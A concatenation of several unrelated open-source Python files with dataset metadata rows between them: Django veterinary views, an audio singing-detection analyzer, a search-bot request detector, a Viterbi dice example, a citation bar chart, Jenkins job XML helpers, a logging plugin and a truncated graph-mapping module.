It requires the permissions to delete a medical issue and is found at the url **/veterinary/medical-condition/<slug>/delete**.'''
permission_required = 'veterinary.delete_medicalcondition'
model = MedicalCondition
template_name = 'confirm_delete.html'
success_url = reverse_lazy('veterinary-home')
class MedicalTreatmentDetail(LoginRequiredMixin, DetailView):
'''This view is for details of a particular :class:`~mousedb.veterinary.MedicalTreatment`.
It passes an object **medical_treatment** when the url **/veterinary/medical-treatment/<slug>** is requested.'''
model = MedicalTreatment
context_object_name = 'medical_treatment'
template_name = 'medical_treatment_detail.html'
class MedicalTreatmentCreate(PermissionRequiredMixin, CreateView):
'''This view is for creating a new :class:`~mousedb.veterinary.MedicalTreatment`.
It requires the permissions to create a new medical issue and is found at the url **/veterinary/medical-treatment/new**.'''
permission_required = 'veterinary.create_medicaltreatment'
model = MedicalTreatment
fields = '__all__'
template_name = 'medical_treatment_form.html'
class MedicalTreatmentUpdate(PermissionRequiredMixin, UpdateView):
'''This view is for updating a :class:`~mousedb.veterinary.MedicalTreatment`.
It requires the permissions to update a medical issue and is found at the url **/veterinary/medical-treatment/<slug>/edit**.'''
permission_required = 'veterinary.update_medicaltreatment'
model = MedicalTreatment
fields = '__all__'
context_object_name = 'medical_treatment'
template_name = 'medical_treatment_form.html'
class MedicalTreatmentDelete(PermissionRequiredMixin, DeleteView):
'''This view is for deleting a :class:`~mousedb.veterinary.MedicalTreatment`.
It requires the permissions to delete a medical issue and is found at the url **/veterinary/medical-treatment/<slug>/delete**.'''
permission_required = 'veterinary.delete_medicaltreatment'
model = MedicalTreatment
template_name = 'confirm_delete.html'
success_url = reverse_lazy('veterinary-home')
| bsd-3-clause | 775,855,840,487,166,100 | 44.75974 | 133 | 0.724847 | false | 3.782609 | false | false | false |
ANR-DIADEMS/timeside-diadems | timeside/plugins/diadems/irit_singings.py | 1 | 7234 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2013 Maxime Le Coz <[email protected]>
# This file is part of TimeSide.
# TimeSide is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# TimeSide is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with TimeSide. If not, see <http://www.gnu.org/licenses/>.
# Author: Maxime Le Coz <[email protected]>
from timeside.core import implements, interfacedoc
from timeside.core.analyzer import Analyzer, IAnalyzer
from timeside.plugins.diadems.irit_monopoly import IRITMonopoly
from timeside.plugins.diadems.irit_harmo_tracking import IRITHarmoTracker
from timeside.core.preprocessors import frames_adapter
from numpy import median, mean, linspace, argmin, argmax, array
from numpy.fft import rfft
from collections import Counter
class IRITSinging(Analyzer):
implements(IAnalyzer)
def __init__(self):
super(IRITSinging, self).__init__()
self.parents['irit_monopoly'] = IRITMonopoly()
self.parents['irit_harmo_tracking'] = IRITHarmoTracker()
self.thPoly = 0.15
self.thMono = 0.1
@interfacedoc
def setup(self, channels=None, samplerate=None, blocksize=None,
totalframes=None):
super(IRITSinging, self).setup(
channels, samplerate, blocksize, totalframes)
@staticmethod
@interfacedoc
def id():
return "irit_singing"
@staticmethod
@interfacedoc
def name():
return "IRIT Singings detection"
@staticmethod
@interfacedoc
def unit():
return ""
def __str__(self):
return "Singings segments"
@frames_adapter
def process(self, frames, eod=False):
return frames, eod
def post_process(self):
"""
:return:
"""
trackings = self.parents['irit_harmo_tracking'].results['irit_harmo_tracking']['data_object']["value"]
tr = sorted(trackings[0].nodes, key=lambda x: x.time)
tr_frame_rate = 1.0 / float(tr[1].time - tr[0].time)
pitch = self.parents['irit_monopoly'].results['irit_monopoly.pitch']['data_object']["value"]
segments_monopoly = self.parents['irit_monopoly'].results['irit_monopoly.segments']['data_object']
segments_monopoly = [(start, start + dur, label == 1) for start, dur, label in
zip(segments_monopoly["time"], segments_monopoly["duration"], segments_monopoly["label"])]
segments_chant = []
f0_frame_rate = 1.0 / float(pitch[1][0] - pitch[0][0])
for start, stop, label in segments_monopoly:
cumulChant = 0
# Attention aux changements de labels ...
if label:
segs = split_notes(extract_pitch(pitch, start, stop), f0_frame_rate)
for seg in segs:
if has_vibrato(seg[2], f0_frame_rate):
cumulChant += seg[1] - seg[0]
segments_chant += [(start, stop, cumulChant / (stop - start) >= self.thMono)]
else:
for start, stop, value in extended_vibrato(trackings, tr_frame_rate):
segments_chant += [(start, stop, value >= self.thPoly)]
label = {1: "Singing", 0: "Non Singing"}
segs = self.new_result(data_mode='label', time_mode='segment')
segs.id_metadata.id += '.' + 'segments'
segs.id_metadata.name += ' ' + 'Segments'
segs.data_object.label_metadata.label = label
segs.data_object.time = array([s[0] for s in segments_chant])
segs.data_object.duration = array([s[1] - s[0] for s in segments_chant])
segs.data_object.label = array([int(s[2]) for s in segments_chant])
self.add_result(segs)
def extended_vibrato(trackings, spectrogram_sampling_rate, number_of_extrema_for_rupture=3):
"""
Detection de vibrato en contexte polyphonique
"""
extremums = [s.start for s in trackings] + [s.stop for s in trackings]
last = max(extremums)
counter = Counter(extremums)
ruptures = [0] + sorted([time for time in counter if counter[time] >= number_of_extrema_for_rupture]) + [last]
scores = []
for i, rupture in enumerate(ruptures[:-1]):
sum_present = 0.0
sum_vibrato = 0.0
for s in trackings:
frequencies = s.get_portion(rupture, ruptures[i + 1])
if len(frequencies) > 0.05 * spectrogram_sampling_rate:
sum_present += len(frequencies)
if has_vibrato(frequencies, spectrogram_sampling_rate):
sum_vibrato += len(frequencies)
if sum_present > 0:
scores += [(rupture, ruptures[i + 1], sum_vibrato / sum_present)]
return scores
def extract_pitch(pitch, start, stop):
return [p for t, p in pitch if start <= t <= stop]
def smoothing(data, number_of_points=3, smoothing_function=mean):
"""
"""
w = number_of_points / 2
return [0.0] * w + [smoothing_function(data[i - w:i + w]) for i in range(w, len(data) - w)] + [0.0] * w
def split_notes(f0, f0_sample_rate, minimum_segment_length=0.0):
"""
Découpage en pseudo-notes en fonction de la fréquence fondamentale.
Retourne la liste des segments en secondes
"""
f0 = smoothing(f0, number_of_points=5, smoothing_function=median)
half_tone_ratio = 2**(1.0 / 12.0)
minimum_segment_length = minimum_segment_length / f0_sample_rate
ratios = [max([y1, y2]) / min([y1, y2]) if min([y1, y2]) > 0 else 0 for y1, y2 in zip(f0[:-2], f0[1:])]
boundaries = [0] + [i + 1 for i, ratio in enumerate(ratios) if ratio > half_tone_ratio]
return [(start * f0_sample_rate, stop * f0_sample_rate, f0[start:stop])
for start, stop in zip(boundaries[:-2], boundaries[1:]) if stop - start > minimum_segment_length]
def has_vibrato(serie, sampling_rate, minimum_frequency=4, maximum_frequency=8, Nfft=100):
"""
Calcul de vibrato sur une serie par la méthode de la transformée de Fourier de la dérivée.
"""
vibrato = False
frequency_scale = linspace(0, sampling_rate / 2, Nfft / 2)
index_min_vibrato = argmin(abs(frequency_scale - minimum_frequency))
index_max_vibrato = argmin(abs(frequency_scale - maximum_frequency))
derivative = [v1 - v2 for v1, v2 in zip(serie[:-2], serie[1:])]
fft_derivative = abs(rfft(derivative, Nfft))[:Nfft / 2]
i_max = argmax(fft_derivative)
if index_max_vibrato >= i_max >= index_min_vibrato:
vibrato = True
return vibrato
# Generate Grapher for IRITSinging analyzer
from timeside.core.grapher import DisplayAnalyzer
DisplayIritSinging = DisplayAnalyzer.create(
analyzer=IRITSinging,
result_id='irit_singing.segments',
grapher_id='grapher_irit_singing_segments',
grapher_name='Singings detection',
background='waveform',
staging=True)
| gpl-2.0 | -1,683,434,666,844,066,000 | 35.14 | 119 | 0.639734 | false | 3.301964 | false | false | false |
SnapSearch/SnapSearch-Client-Python | src/SnapSearch/detector.py | 1 | 11166 | # -*- coding: utf-8 -*-
"""
SnapSearch.detector
~~~~~~~~~~~~~~~~~~~
:copyright: 2014 by `SnapSearch <https://snapsearch.io/>`_
:license: MIT, see LICENSE for more details.
:author: `LIU Yu <[email protected]>`_
:date: 2014/03/08
"""
# future import should come first
from __future__ import with_statement
__all__ = ['Detector', ]
import json
import os
import re
import sys
import SnapSearch.api as api
import SnapSearch.error as error
from ._compat import u
class Detector(object):
"""
Detects if the incoming HTTP request a) came from a search engine robot
and b) is eligible for interception. The ``Detector`` inspects the
following aspects of the incoming HTTP request:
1. if the request uses HTTP or HTTPS protocol
2. if the request uses HTTP ``GET`` method
3. if the request is *not* from any ignored user agenets
(ignored robots take precedence over matched robots)
4. if the request is accessing any route *not* matching the whitelist
5. if the request is *not* accessing any route matching the blacklist
6. if the request is *not* accessing any resource with an invalid
file extension
7. if the request has ``_escaped_fragment_`` query parameter
8. if the request is from any matched user agents
"""
@property
def robots(self):
"""
``dict`` of ``list``'s of user agents from search engine robots:
.. code-block:: json
{
"ignore": [
# user agents to be ignored
]
"match": [
# user agents to be matched
]
}
Can be changed to customize ignored and matched search engine robots.
The ``ignore`` list takes precedence over the ``match`` list.
"""
return self.__robots
@property
def extensions(self):
"""
``dict`` of ``list``'s of valid file extensions:
.. code-block:: json
{
"generic": [
# valid generic extensions
],
"python": [
# valid python extensions
]
}
Can be changed to customize valid file extensions.
"""
return self.__extensions
# private properties
__slots__ = ['__check_file_extensions', '__extensions', '__ignored_routes',
'__matched_routes', '__robots', ]
def __init__(self,
ignored_routes=[],
matched_routes=[],
check_file_extensions=False,
robots_json=None,
extensions_json=None):
"""
Optional arguments:
:param ignored_routes: blacklisted route regular expressions.
:type ignored_routes: ``list`` or ``tuple``
:param matched_routes: whitelisted route regular expressions.
:type matched_routes: ``list`` or ``tuple``
:param check_file_extensions: to check if the URL is going to a static
file resource that should not be intercepted.
:type check_file_extensions: ``bool``
:param robots_json: absolute path to an external ``robots.json`` file.
:param extensions_json: absolute path to an external
``extensions.json`` file.
:raises AssertionError: if ``extensions.json`` is specified, yet
``check_file_extensions`` is ``False``.
"""
self.__ignored_routes = set(ignored_routes)
self.__matched_routes = set(matched_routes)
# ``extensions.json`` is specified, yet do not require checking file
# extensions. this probably means a mistake.
assert(not (not check_file_extensions and extensions_json)), \
"specified ``extensions_json`` " \
"yet ``check_file_extensions`` is false"
self.__check_file_extensions = check_file_extensions
# json.load() may raise IOError, TypeError, or ValueError
with open(robots_json or api.DEFAULT_ROBOTS_JSON) as f:
self.__robots = json.load(f)
f.close()
# same as above
with open(extensions_json or api.DEFAULT_EXTENSIONS_JSON) as f:
self.__extensions = json.load(f)
f.close()
pass # void return
def __call__(self, request):
"""
:param request: incoming HTTP request.
:type request: ``dict``
:returns: :RFC:`3986` percent-encoded full URL if the incoming HTTP
request is eligible for interception, or ``None`` otherwise.
:raises error.SnapSearchError: if the structure of either
``robots.json`` or ``extensions.json`` is invalid.
"""
# wrap the incoming HTTP request (CGI-style environ)
environ = api.AnyEnv(request)
# do not intercept protocols other than HTTP and HTTPS
if environ.scheme not in ("http", "https", ):
return None
# do not intercept HTTP methods other than GET
if environ.method not in ("GET", ):
return None
# user agent may not exist in the HTTP request
user_agent = environ.user_agent
# request uri with query string
real_path = environ.path_qs
# validate ``robots`` since it can be altered from outside
if not self._validate_robots():
raise error.SnapSearchError(
"structure of ``robots`` is invalid")
# do not intercept requests from ignored robots
ignore_regex = u("|").join(
[re.escape(tok) for tok in self.robots.get('ignore', [])])
if re.search(ignore_regex, user_agent, re.I | re.U):
return None
# do not intercept if there exist whitelisted route(s) (matched_routes)
# and that the requested route **does not** match any one of them.
if self.__matched_routes:
found = False
for route in self.__matched_routes:
route_regex = u(route)
if re.search(route_regex, real_path, re.I | re.U):
found = True
break
if not found:
return None
# do not intercept if there exist blacklisted route(s) (ignored_routes)
# and that the requested route **does** matches one of them.
if self.__ignored_routes:
for route in self.__ignored_routes:
route_regex = u(route)
if re.search(route_regex, real_path, re.I | re.U):
return None
# detect extensions in order to prevent direct requests to static files
if self.__check_file_extensions:
# validate ``extensions`` since it can be altered from outside
if not self._validate_extensions():
raise error.SnapSearchError(
"structure of ``extensions`` is invalid")
# create a set of file extensions common for HTML resources
valid_extensions = set(
[s.lower() for s in self.extensions.get('generic', [])])
valid_extensions.update(
[s.lower() for s in self.extensions.get('python', [])])
# file extension regex. it looks for "/{file}.{ext}" in an URL that
# is not preceded by '?' (query parameters) or '#' (hash fragment).
# it will acquire the last extension that is present in the URL so
# with "/{file1}.{ext1}/{file2}.{ext2}" the ext2 will be the
# matched extension. furthermore if a file has multiple extensions
# "/{file}.{ext1}.{ext2}", it will only match extension2 because
# unix systems don't consider extensions to be metadata, and
# windows only considers the last extension to be valid metadata.
# Basically the {file}.{ext1} could actually just be the filename.
extension_regex = u(r"""
^ # start of the string
(?: # begin non-capturing group
(?! # begin negative lookahead
[?#] # question mark '?' or hash '#'
.* # zero or more wildcard characters
/ # literal slash '/'
[^/?#]+ # {file} - has one or more of any character
# except '/', '?' or '#'
\. # literal dot '.'
[^/?#]+ # {extension} - has one or more of any character
# except '/', '?' or '#'
) # end negative lookahead (prevents any '?' or
# '#' that precedes {file}.{extension} by
# any characters)
. # one wildcard character
)* # end non-capturing group (captures any number
# of wildcard characters that passes the
# negative lookahead)
/ # literal slash '/'
[^/?#]+ # {file} - has one or more of any character
# except forward slash, question mark or hash
\. # literal dot '.'
([^/?#]+) # {extension} - subgroup has one or more of any
# character except '/', '?' or '#'
""")
# match extension regex against decoded path
matches = re.match(extension_regex, real_path, re.U | re.X)
if matches:
url_extension = matches.group(1).lower()
if url_extension not in valid_extensions:
return None
# detect escaped fragment (since the ignored user agents has already
# been detected, SnapSearch won't continue the interception loop)
if "_escaped_fragment_" in environ.GET:
return environ.url
# intercept requests from matched robots
matched_regex = u("|").join(
[re.escape(tok) for tok in self.robots.get('match', [])])
if re.search(matched_regex, user_agent, re.I | re.U):
return environ.url
# do not intercept if no match at all
return None
def _validate_robots(self):
# ``robots`` should be a ``dict`` object, if keys ``ignore`` and
# ``match`` exist, the respective values must be ``list`` objects.
return isinstance(self.robots, dict) and \
isinstance(self.robots.get('ignore', []), list) and \
isinstance(self.robots.get('match', []), list)
def _validate_extensions(self):
# ``extensions`` should be a ``dict`` object, if keys ``generic`` and
# ``python`` exist, the respective values must be ``list`` objects.
return isinstance(self.extensions, dict) and \
isinstance(self.extensions.get('generic', []), list) and \
isinstance(self.extensions.get('python', []), list)
pass
| mit | 7,516,432,823,431,704,000 | 38.178947 | 79 | 0.543346 | false | 4.695542 | false | false | false |
afodor/pythonExamples | src/viterbi/viterbiExample.py | 1 | 2894 | import random
class MarkovState:
def __init__(self,charsToEmit, emissionProbs,transitionProbs):
self.charsToEmit = charsToEmit
self.emissionProbs = emissionProbs
self.transitionProbs = transitionProbs
def getEmissionIndex(self):
aRand = random.random()
cumulative = 0
index =0
for val in self.emissionProbs:
cumulative += val
if aRand <= cumulative:
return index
index = index + 1
return len(self.emissionProbs) - 1
def getIndexOfEmission(self, char):
for i in range(0, len(self.charsToEmit) ):
if str(self.charsToEmit[i]) == str(char):
return i
raise Exception("Cound not find " + str(char) )
def getTransitionIndex(self):
aRand = random.random()
cumulative = 0
index =0
for val in self.transitionProbs:
cumulative += val
if aRand <= cumulative:
return index
index = index + 1
return len(self.transitionProbs) - 1
def getMaxIndex( iterable ):
val = iterable[0]
index =0
returnVal =0
for i in iterable:
if i > val:
returnVal = index
index = index+1
return returnVal
def getViterbiPath( markovStates, output):
returnPath= []
oldViterbiProbs = []
oldViterbiProbs.append(1) # we are 100% sure we start in the first state
for i in range( 1, len(markovStates) ):
oldViterbiProbs.append( 0)
aTuple = ( oldViterbiProbs, 0)
returnPath.append( aTuple )
for i in range( 0,len(output)):
newViterbiProbs = []
for j in range( 0, len(markovStates)):
state = markovStates[j]
emissionProb = state.emissionProbs[state.getIndexOfEmission(output[i])]
vTimesA=[]
for k in range(0, len(markovStates)):
vTimesA.append (oldViterbiProbs[k] * markovStates[k].transitionProbs[j])
#print( "vTimesA" + str( vTimesA))
maxVal = vTimesA[ getMaxIndex(vTimesA) ]
newViterbiProbs.append( emissionProb * maxVal)
aTuple = (newViterbiProbs,getMaxIndex(newViterbiProbs))
returnPath.append( aTuple)
oldViterbiProbs = newViterbiProbs
return returnPath
dice = ( 1,2,3,4,5,6 )
fairState = MarkovState( dice, (1/6,1/6,1/6,1/6,1/6,1/6), ( 0.95, 0.05) )
loadedState = MarkovState( dice, (1/10,1/10,1/10,1/10,1/10,5/10), ( 0.10, 0.90) )
states = ( fairState, loadedState )
################################################
rolls = "266666"
getViterbiPath( states, rolls)
################################################
rolls = ""
trueStates = ""
state = states[0]
for i in range( 1, 100):
nextState = state.getTransitionIndex()
state = states[ nextState]
trueStates = trueStates + str(nextState)
rolls = rolls + str( dice[ state.getEmissionIndex()] )
rolls
trueStates
viterbiPath = getViterbiPath( states, rolls)
for i in range(0, len(rolls)):
print( str(rolls[i]) + " " + str(trueStates[i])+ " " + str(viterbiPath[i][1]))
################################################
| gpl-2.0 | 38,707,374,708,130,250 | 25.561905 | 81 | 0.630615 | false | 2.817916 | false | false | false |
salazardetroya/libmesh | doc/statistics/libmesh_citations.py | 1 | 2340 | #!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
# Number of "papers using libmesh" by year.
#
# Note 1: this does not count citations "only," the authors must have actually
# used libmesh in part of their work. Therefore, these counts do not include
# things like Wolfgang citing us in his papers to show how Deal.II is
# superior...
#
# Note 2: I typically update this data after regenerating the web page,
# since bibtex2html renumbers the references starting from "1" each year.
#
# Note 3: These citations include anything that is not a dissertation/thesis.
# So, some are conference papers, some are journal articles, etc.
#
# Note 4: The libmesh paper came out in 2006, but there are some citations
# prior to that date, obviously. These counts include citations of the
# website libmesh.sf.net as well...
#
# Note 5: Preprints are listed as the "current year + 1" and are constantly
# being moved to their respective years after being published.
data = [
'2004', 5,
'\'05', 2,
'\'06', 13,
'\'07', 8,
'\'08', 23,
'\'09', 30,
'\'10', 24,
'\'11', 37,
'\'12', 50,
'\'13', 78,
'\'14', 60,
'\'15', 11,
'P', 8, # Preprints
'T', 36 # Theses
]
# Extract the x-axis labels from the data array
xlabels = data[0::2]
# Extract the publication counts from the data array
n_papers = data[1::2]
# The number of data points
N = len(xlabels);
# Get a reference to the figure
fig = plt.figure()
# 111 is equivalent to Matlab's subplot(1,1,1) command
ax = fig.add_subplot(111)
# Create an x-axis for plotting
x = np.linspace(1, N, N)
# Width of the bars
width = 0.8
# Make the bar chart. Plot years in blue, preprints and theses in green.
ax.bar(x[0:N-2], n_papers[0:N-2], width, color='b')
ax.bar(x[N-2:N], n_papers[N-2:N], width, color='g')
# Label the x-axis
plt.xlabel('P=Preprints, T=Theses')
# Set up the xtick locations and labels. Note that you have to offset
# the position of the ticks by width/2, where width is the width of
# the bars.
ax.set_xticks(np.linspace(1,N,N) + width/2)
ax.set_xticklabels(xlabels)
# Create a title string
title_string = 'LibMesh Citations, (' + str(sum(n_papers)) + ' Total)'
fig.suptitle(title_string)
# Save as PDF
plt.savefig('libmesh_citations.pdf')
# Local Variables:
# python-indent: 2
# End:
| lgpl-2.1 | 302,535,557,434,097,100 | 26.529412 | 78 | 0.674359 | false | 2.962025 | false | false | false |
Strangemother/python-state-machine | scratch/machine_4/integration.py | 1 | 4183 | from tools import color_print as cl
class ConditionIntegrate(object):
def read_node(self, node):
'''
Read the conditions of a node.
'''
if hasattr(node, 'conditions') is False:
return
cnds = node.conditions()
# cl('yellow', 'get conditions for node', node)
self.integrate_conditions(cnds, node)
def integrate_conditions(self, conditions, node):
'''
Implement a list of conditions against one node.
'''
for c in conditions:
self.integrate_condition(c, node)
def integrate_condition(self, cond, node):
'''
Integrate the conditions into the condition runner
'''
if hasattr(self, 'condition_keys') is False:
setattr(self, 'condition_keys', {})
if hasattr(self, 'condition_nodes') is False:
setattr(self, 'condition_nodes', {})
names = self.get_integration_names(node, cond)
# cl('yellow', 'integrate conditions', node, cond, names)
self.append_with_names(names, cond)
# node, condition assications
ck = self.condition_keys
sc = str(cond)
if (sc in ck) is False:
ck[sc] = []
ck[sc].append(node.get_name())
def get_integration_names(self, node, condition):
node_name = node.get_name()
names = (node_name, str(condition), )
return names
def run_conditions(self, conditions, node, value, field):
# pprint(self.conditions._names)
# cl('yellow', 'run conditions', conditions, node, field)
pairs = []
# fetch associated conditions.
# make the condition perform the compare
for cond in conditions:
# get associated nodes for the condition
node_names = self.condition_keys.get(str(cond)) or []
# loop and get associated condition
for nn in node_names:
s = '{0}-{1}'.format(nn, str(cond))
r = self.get(s) or []
f = [(self.nodes.get(nn), set(r),)]
# cl('yellow', 'found', f)
pairs.extend( f )
res = {}
for parent_nodes, _conditions in pairs:
for cnd in _conditions:
for pn in parent_nodes:
v = cnd.validate(pn, node, value, field)
n = '{0}-{1}'.format(pn.get_name(), str(cnd))
res[n]= v
# cl('blue', 'conditions', res)
return res
def find_conditions(self, node, field, value):
n = '{0}_{1}_{2}'.format(node.get_name(), field, value)
# print '+ find conditions on', n
cnds = self.get_conditions(node, field, value)
# cl('yellow', '-- Matches condition', cnds)
return cnds
def get_conditions(self, node, name, value=None):
'''
Get conditions based upon node and name
'''
node_name = node
cl('red', 'get condition', node, name, value)
cnds = self.conditions
if hasattr(node_name, 'get_name'):
node_name = node.get_name()
name1 = '{0}_{1}'.format(node_name, name)
match_names = (name1, )
# exact match string
if value is not None:
vcn = '{0}_{1}_{2}'.format(node_name, name, value)
match_names += (vcn,)
res = []
for _n in match_names:
res += self.get_conditions_by_name(_n) or []
# print 'found conditions', res
return set(res)
def get_conditions_by_name(self, name):
'''
return the conditions matching a name provided.
'''
cnds = self.conditions.get(name)
# print 'get_condition_by_name:', name, cnds
return cnds
def condition_name(self, node, name, *args, **kw):
'''
create a name for a condition string match from the
values passed.
The node is the original object receiving the change.
name denoted the key changing.
returned is a string for the condition
'''
n = node.get_name()
a = [n, args[0]]
s = '_'.join(a)
return s
| mit | -4,974,785,414,804,036,000 | 31.176923 | 65 | 0.537413 | false | 4.061165 | false | false | false |
caio1982/capomastro | jenkins/utils.py | 1 | 4525 | from urlparse import urljoin
import xml.etree.ElementTree as ET
from django.conf import settings
from django.core.urlresolvers import reverse
from django.template import Template, Context
from django.utils import timezone
from django.utils.text import slugify
PARAMETERS = ".//properties/hudson.model.ParametersDefinitionProperty/parameterDefinitions/"
def get_notifications_url(base, server):
"""
Returns the full URL for notifications given a base.
"""
url = urljoin(base, reverse("jenkins_notifications"))
return url + "?server=%d" % server.pk
def get_context_for_template(job, server):
"""
Returns a Context for the Job XML templating.
"""
defaults = DefaultSettings({"NOTIFICATION_HOST": "http://localhost"})
url = get_notifications_url(defaults.NOTIFICATION_HOST, server)
context_vars = {
"notifications_url": url,
"job": job,
"jobtype": job.jobtype,
}
return Context(context_vars)
def get_job_xml_for_upload(job, server):
"""
Return config_xml run through the template mechanism.
"""
template = Template(job.jobtype.config_xml)
context = get_context_for_template(job, server)
# We need to strip leading/trailing whitespace in order to avoid having the
# <?xml> PI not in the first line of the document.
job_xml = template.render(context).strip()
requestor = JenkinsParameter(
"REQUESTOR", "The username requesting the build", "")
job_xml = add_parameter_to_job(requestor, job_xml)
return job_xml
def generate_job_name(jobtype):
"""
Generates a "unique" id.
"""
return "%s_%s" % (slugify(jobtype.name), timezone.now().strftime("%s"))
class DefaultSettings(object):
"""
Allows easy configuration of default values for a Django settings.
e.g. values = DefaultSettings({"NOTIFICATION_HOST": "http://example.com"})
values.NOTIFICATION_HOST # returns the value from the default django
settings, or the default if not provided in the settings.
"""
class _defaults(object):
pass
def __init__(self, defaults):
self.defaults = self._defaults()
for key, value in defaults.iteritems():
setattr(self.defaults, key, value)
def __getattr__(self, key):
return getattr(settings, key, getattr(self.defaults, key))
def get_value_or_none(self, key):
"""
Doesn't raise an AttributeError in the event that the key doesn't
exist.
"""
return getattr(settings, key, getattr(self.defaults, key, None))
def parse_parameters_from_job(body):
"""
Parses the supplied XML document and extracts all parameters, returns a
list of dictionaries with the details of the parameters extracted.
"""
result = []
root = ET.fromstring(body)
for param in root.findall(PARAMETERS):
item = {}
for param_element in param.findall("./"):
item[param_element.tag] = param_element.text
result.append(item)
return result
class JenkinsParameter(object):
"""Represents a parameter for a Jenkins job."""
definition = "TextParameterDefinition"
def __init__(self, name, description, default):
self.name = name
self.description = description
self.default = default
@property
def type(self):
return "hudson.model.%s" % self.definition
def parameter_to_xml(param):
"""
Converts a JenkinsParameter to the XML element representation for a Jenkins
job parameter.
"""
element = ET.Element(param.type)
ET.SubElement(element, "name").text = param.name
ET.SubElement(element, "description").text = param.description
ET.SubElement(element, "defaultValue").text = param.default
return element
def add_parameter_to_job(param, job):
"""
Adds a JenkinsParameter to an existing job xml document, returns the job XML
as a string.
# NOTE: This does nothing to check whether or not the parameter already
# exists.
"""
root = ET.fromstring(job)
parameters_container = root.find(PARAMETERS[:-1])
if parameters_container is None:
parameters = root.find(".//hudson.model.ParametersDefinitionProperty")
if parameters is None:
parameters = ET.SubElement(root, "hudson.model.ParametersDefinitionProperty")
parameters_container = ET.SubElement(parameters, "parameterDefinitions")
parameters_container.append(parameter_to_xml(param))
return ET.tostring(root)
| mit | 3,326,860,643,878,144,500 | 29.993151 | 92 | 0.671381 | false | 4.170507 | false | false | false |
koomik/CouchPotatoServer | couchpotato/core/plugins/log/main.py | 1 | 4216 | import os
import traceback
from couchpotato.api import addApiView
from couchpotato.core.helpers.encoding import toUnicode
from couchpotato.core.helpers.variable import tryInt
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
log = CPLog(__name__)
class Logging(Plugin):
def __init__(self):
addApiView('logging.get', self.get, docs = {
'desc': 'Get the full log file by number',
'params': {
'nr': {'desc': 'Number of the log to get.'}
},
'return': {'type': 'object', 'example': """{
'success': True,
'log': string, //Log file
'total': int, //Total log files available
}"""}
})
addApiView('logging.partial', self.partial, docs = {
'desc': 'Get a partial log',
'params': {
'type': {'desc': 'Type of log', 'type': 'string: all(default), error, info, debug'},
'lines': {'desc': 'Number of lines. Last to first. Default 30'},
},
'return': {'type': 'object', 'example': """{
'success': True,
'log': string, //Log file
}"""}
})
addApiView('logging.clear', self.clear, docs = {
'desc': 'Remove all the log files'
})
addApiView('logging.log', self.log, docs = {
'desc': 'Log errors',
'params': {
'type': {'desc': 'Type of logging, default "error"'},
'**kwargs': {'type': 'object', 'desc': 'All other params will be printed in the log string.'},
}
})
def get(self, nr = 0, **kwargs):
nr = tryInt(nr)
current_path = None
total = 1
for x in range(0, 50):
path = '%s%s' % (Env.get('log_path'), '.%s' % x if x > 0 else '')
# Check see if the log exists
if not os.path.isfile(path):
total = x - 1
break
# Set current path
if x is nr:
current_path = path
log_content = ''
if current_path:
f = open(current_path, 'r')
log_content = f.read()
return {
'success': True,
'log': toUnicode(log_content),
'total': total,
}
def partial(self, type = 'all', lines = 30, **kwargs):
total_lines = tryInt(lines)
log_lines = []
for x in range(0, 50):
path = '%s%s' % (Env.get('log_path'), '.%s' % x if x > 0 else '')
# Check see if the log exists
if not os.path.isfile(path):
break
f = open(path, 'r')
reversed_lines = toUnicode(f.read()).split('[0m\n')
reversed_lines.reverse()
brk = False
for line in reversed_lines:
if type == 'all' or '%s ' % type.upper() in line:
log_lines.append(line)
if len(log_lines) >= total_lines:
brk = True
break
if brk:
break
log_lines.reverse()
return {
'success': True,
'log': '[0m\n'.join(log_lines),
}
def clear(self, **kwargs):
for x in range(0, 50):
path = '%s%s' % (Env.get('log_path'), '.%s' % x if x > 0 else '')
if not os.path.isfile(path):
continue
try:
# Create empty file for current logging
if x is 0:
self.createFile(path, '')
else:
os.remove(path)
except:
log.error('Couldn\'t delete file "%s": %s', (path, traceback.format_exc()))
return {
'success': True
}
def log(self, type = 'error', **kwargs):
try:
log_message = 'API log: %s' % kwargs
try:
getattr(log, type)(log_message)
except:
log.error(log_message)
except:
log.error('Couldn\'t log via API: %s', kwargs)
return {
'success': True
}
| gpl-3.0 | -6,851,123,021,384,806,000 | 26.376623 | 110 | 0.463947 | false | 4.026743 | false | false | false |
WilsonWangTHU/neural_graph_evolution | graph_util/structure_mapper.py | 1 | 7819 | #!/usr/bin/env python2
# -----------------------------------------------------------------------------
# @author:
# Tingwu Wang, Jun 23rd, 2017
# -----------------------------------------------------------------------------
import init_path
from util import logger
from . import mujoco_parser
import numpy as np
_BASE_DIR = init_path.get_base_dir()
def map_output(transfer_env, i_value, added_constant, gnn_option_list):
'''
@brief:
i_value could be the logstd (1, num_action), policy_output/w
(64, num_action), policy_output/b (1, num_action)
'''
assert len(gnn_option_list) == 4
i_value = np.transpose(i_value) # make the num_action to the front
ienv, oenv = [env + '-v1' for env in transfer_env.split('2')]
ienv_info = mujoco_parser.parse_mujoco_graph(
ienv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
oenv_info = mujoco_parser.parse_mujoco_graph(
oenv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
if len(i_value.shape) > 1:
o_value = np.zeros([len(oenv_info['output_list']), i_value.shape[1]])
else:
# the b matrix
o_value = np.zeros([len(oenv_info['output_list'])])
assert len(i_value) == len(ienv_info['output_list'])
ienv_node_name_list = [node['name'] for node in ienv_info['tree']]
for output_id, output_node_id in enumerate(oenv_info['output_list']):
# get the name of the joint
node_name = oenv_info['tree'][output_node_id]['name']
# if the node is alreay in the input environment?
if node_name in ienv_node_name_list:
if ienv_node_name_list.index(node_name) not in \
ienv_info['output_list']:
logger.warning('Missing joint: {}'.format(node_name))
continue
o_value[output_id] = i_value[
ienv_info['output_list'].index(
ienv_node_name_list.index(node_name)
)
]
else:
